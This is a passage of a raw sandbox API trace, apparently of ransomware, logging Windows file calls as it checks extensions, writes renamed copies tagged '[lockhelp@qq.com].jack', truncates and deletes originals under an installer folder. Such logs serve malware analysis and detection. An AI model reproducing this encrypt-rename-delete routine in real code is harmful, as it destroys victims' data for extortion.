lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0197.248] lstrlenW (lpString=".zip") returned 4 [0197.248] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.248] lstrlenW (lpString=".rar") returned 4 [0197.248] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.248] lstrlenW (lpString=".bz2") returned 4 [0197.248] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.249] lstrlenW (lpString=".7z") returned 3 [0197.249] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.249] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0197.249] lstrlenW (lpString=".dbf") returned 4 [0197.249] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.249] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0197.249] lstrlenW (lpString=".1cd") returned 4 [0197.249] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.249] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\SetupResources.dll") returned 45 [0197.249] lstrlenW (lpString=".jpg") returned 4 [0197.249] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.249] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0197.249] lstrlenW (lpString="SetupResources.dll") returned 18 [0197.249] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.249] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=18264) returned 1 [0197.249] CloseHandle (hObject=0x3f0) returned 1 [0197.249] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll")) returned 0x80 [0197.250] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.250] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.250] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.250] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.250] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0197.275] GetLastError () returned 0x0 [0197.275] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x4758, lpOverlapped=0x0) returned 1 [0197.303] WriteFile (in: hFile=0x414, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x4760, lpOverlapped=0x0) returned 1 [0197.304] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.304] WriteFile (in: hFile=0x414, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.304] SetEndOfFile (hFile=0x414) returned 1 [0197.304] CloseHandle (hObject=0x414) returned 1 [0197.306] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.306] SetEndOfFile (hFile=0x3f0) returned 1 [0197.307] CloseHandle (hObject=0x3f0) returned 1 [0197.307] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.307] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll")) returned 1 [0197.307] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0197.307] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0197.308] lstrlenW (lpString=".doc") returned 4 [0197.308] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.308] lstrlenW (lpString=".docx") returned 5 [0197.308] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.308] lstrlenW (lpString=".pdf") returned 4 [0197.308] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.308] lstrlenW (lpString=".xls") returned 4 [0197.308] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.308] lstrlenW (lpString=".xlsx") returned 5 [0197.308] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.308] lstrlenW (lpString=".ppt") returned 4 [0197.308] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.308] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0197.308] lstrlenW (lpString=".zip") returned 4 [0197.308] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.308] lstrlenW (lpString=".rar") returned 4 [0197.308] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.308] lstrlenW (lpString=".bz2") returned 4 [0197.308] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.308] lstrlenW (lpString=".7z") returned 3 [0197.308] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.308] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0197.308] lstrlenW (lpString=".dbf") returned 4 [0197.308] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.308] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0197.308] lstrlenW (lpString=".1cd") returned 4 [0197.308] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.308] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0197.308] lstrlenW (lpString=".jpg") returned 4 [0197.309] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.309] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0197.309] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0197.309] lstrlenW (lpString=".doc") returned 4 [0197.309] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.309] lstrlenW (lpString=".docx") returned 5 [0197.309] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.309] lstrlenW (lpString=".pdf") returned 4 [0197.309] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.309] lstrlenW (lpString=".xls") returned 4 [0197.309] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.309] lstrlenW (lpString=".xlsx") returned 5 [0197.309] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.309] lstrlenW (lpString=".ppt") returned 4 [0197.309] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.309] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0197.309] lstrlenW (lpString=".zip") returned 4 [0197.309] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.309] lstrlenW (lpString=".rar") returned 4 [0197.309] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.309] lstrlenW (lpString=".bz2") returned 4 [0197.309] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.309] lstrlenW (lpString=".7z") returned 3 [0197.309] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.309] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0197.309] lstrlenW (lpString=".dbf") returned 4 [0197.310] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.310] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0197.310] lstrlenW (lpString=".1cd") returned 4 [0197.310] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.310] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0197.310] lstrlenW (lpString=".jpg") returned 4 [0197.310] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.310] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0197.310] lstrlenW (lpString="SetupResources.dll") returned 18 [0197.310] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.310] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=18776) returned 1 [0197.310] CloseHandle (hObject=0x3f0) returned 1 [0197.310] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll")) returned 0x80 [0197.310] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.311] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.311] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.311] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.311] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0197.348] GetLastError () returned 0x0 [0197.348] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x4958, lpOverlapped=0x0) returned 1 [0197.354] WriteFile (in: hFile=0x418, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x4960, lpOverlapped=0x0) returned 1 [0197.356] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.356] WriteFile (in: hFile=0x418, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.356] SetEndOfFile (hFile=0x418) returned 1 [0197.356] CloseHandle (hObject=0x418) returned 1 [0197.358] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.358] SetEndOfFile (hFile=0x3f0) returned 1 [0197.359] CloseHandle (hObject=0x3f0) returned 1 [0197.359] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.359] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll")) returned 1 [0197.359] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0197.359] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0197.360] lstrlenW (lpString=".doc") returned 4 [0197.360] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.360] lstrlenW (lpString=".docx") returned 5 [0197.360] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.360] lstrlenW (lpString=".pdf") returned 4 [0197.360] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.360] lstrlenW (lpString=".xls") returned 4 [0197.360] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.360] lstrlenW (lpString=".xlsx") returned 5 [0197.360] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.360] lstrlenW (lpString=".ppt") returned 4 [0197.360] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.360] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0197.360] lstrlenW (lpString=".zip") returned 4 [0197.360] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.360] lstrlenW (lpString=".rar") returned 4 [0197.360] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.360] lstrlenW (lpString=".bz2") returned 4 [0197.360] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.360] lstrlenW (lpString=".7z") returned 3 [0197.360] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.360] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0197.360] lstrlenW (lpString=".dbf") returned 4 [0197.360] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.360] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0197.360] lstrlenW (lpString=".1cd") returned 4 [0197.360] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.360] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0197.360] lstrlenW (lpString=".jpg") returned 4 [0197.361] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.361] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0197.361] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0197.361] lstrlenW (lpString=".doc") returned 4 [0197.361] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.361] lstrlenW (lpString=".docx") returned 5 [0197.361] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.361] lstrlenW (lpString=".pdf") returned 4 [0197.361] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.361] lstrlenW (lpString=".xls") returned 4 [0197.361] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.361] lstrlenW (lpString=".xlsx") returned 5 [0197.361] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.361] lstrlenW (lpString=".ppt") returned 4 [0197.361] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.361] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0197.361] lstrlenW (lpString=".zip") returned 4 [0197.361] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.361] lstrlenW (lpString=".rar") returned 4 [0197.361] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.361] lstrlenW (lpString=".bz2") returned 4 [0197.361] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.361] lstrlenW (lpString=".7z") returned 3 [0197.361] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.361] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0197.361] lstrlenW (lpString=".dbf") returned 4 [0197.361] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.361] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0197.361] lstrlenW (lpString=".1cd") returned 4 [0197.362] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.362] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 45 [0197.362] lstrlenW (lpString=".jpg") returned 4 [0197.362] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.362] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0197.362] lstrlenW (lpString="SetupResources.dll") returned 18 [0197.362] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.362] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=18776) returned 1 [0197.362] CloseHandle (hObject=0x3f0) returned 1 [0197.362] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll")) returned 0x80 [0197.362] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.362] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.363] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.363] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.363] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.465] GetLastError () returned 0x0 [0197.465] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x4958, lpOverlapped=0x0) returned 1 [0197.491] WriteFile (in: hFile=0x420, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0x4960, lpOverlapped=0x0) returned 1 [0197.492] ReadFile (in: hFile=0x3f0, lpBuffer=0x4117020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x341fecc, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesRead=0x341fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.492] WriteFile (in: hFile=0x420, lpBuffer=0x4117020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x341fc94, lpOverlapped=0x0 | out: lpBuffer=0x4117020*, lpNumberOfBytesWritten=0x341fc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.492] SetEndOfFile (hFile=0x420) returned 1 [0197.492] CloseHandle (hObject=0x420) returned 1 [0197.493] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.493] SetEndOfFile (hFile=0x3f0) returned 1 [0197.494] CloseHandle (hObject=0x3f0) returned 1 [0197.495] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.495] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll")) returned 1 [0197.495] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0197.495] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0197.495] lstrlenW (lpString=".doc") returned 4 [0197.495] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.495] lstrlenW (lpString=".docx") returned 5 [0197.495] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.495] lstrlenW (lpString=".pdf") returned 4 [0197.495] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.495] lstrlenW (lpString=".xls") returned 4 [0197.495] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.496] lstrlenW (lpString=".xlsx") returned 5 [0197.496] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.496] lstrlenW (lpString=".ppt") returned 4 [0197.496] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.496] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0197.496] lstrlenW (lpString=".zip") returned 4 [0197.496] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.496] lstrlenW (lpString=".rar") returned 4 [0197.496] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.496] lstrlenW (lpString=".bz2") returned 4 [0197.496] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.496] lstrlenW (lpString=".7z") returned 3 [0197.496] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.496] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0197.496] lstrlenW (lpString=".dbf") returned 4 [0197.496] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.496] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0197.496] lstrlenW (lpString=".1cd") returned 4 [0197.496] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.496] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0197.496] lstrlenW (lpString=".jpg") returned 4 [0197.496] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.496] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0197.496] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0197.496] lstrlenW (lpString=".doc") returned 4 [0197.496] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.497] lstrlenW (lpString=".docx") returned 5 [0197.497] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.497] lstrlenW (lpString=".pdf") returned 4 [0197.497] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.497] lstrlenW (lpString=".xls") returned 4 [0197.497] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.497] lstrlenW (lpString=".xlsx") returned 5 [0197.497] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.497] lstrlenW (lpString=".ppt") returned 4 [0197.497] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.497] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0197.497] lstrlenW (lpString=".zip") returned 4 [0197.497] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.497] lstrlenW (lpString=".rar") returned 4 [0197.497] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.497] lstrlenW (lpString=".bz2") returned 4 [0197.497] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.497] lstrlenW (lpString=".7z") returned 3 [0197.497] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.497] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0197.497] lstrlenW (lpString=".dbf") returned 4 [0197.497] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.497] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0197.497] lstrlenW (lpString=".1cd") returned 4 [0197.497] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.497] lstrlenW (lpString="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 45 [0197.498] lstrlenW (lpString=".jpg") returned 4 [0197.498] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.498] lstrcmpiW (lpString1=".ico", lpString2=".jack") returned -1 [0197.498] lstrlenW (lpString="Rotate6.ico") returned 11 [0197.498] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.498] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=894) returned 1 [0197.498] CloseHandle (hObject=0x3f0) returned 1 [0197.498] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico")) returned 0x80 [0197.498] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.498] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0 [0197.499] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.499] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 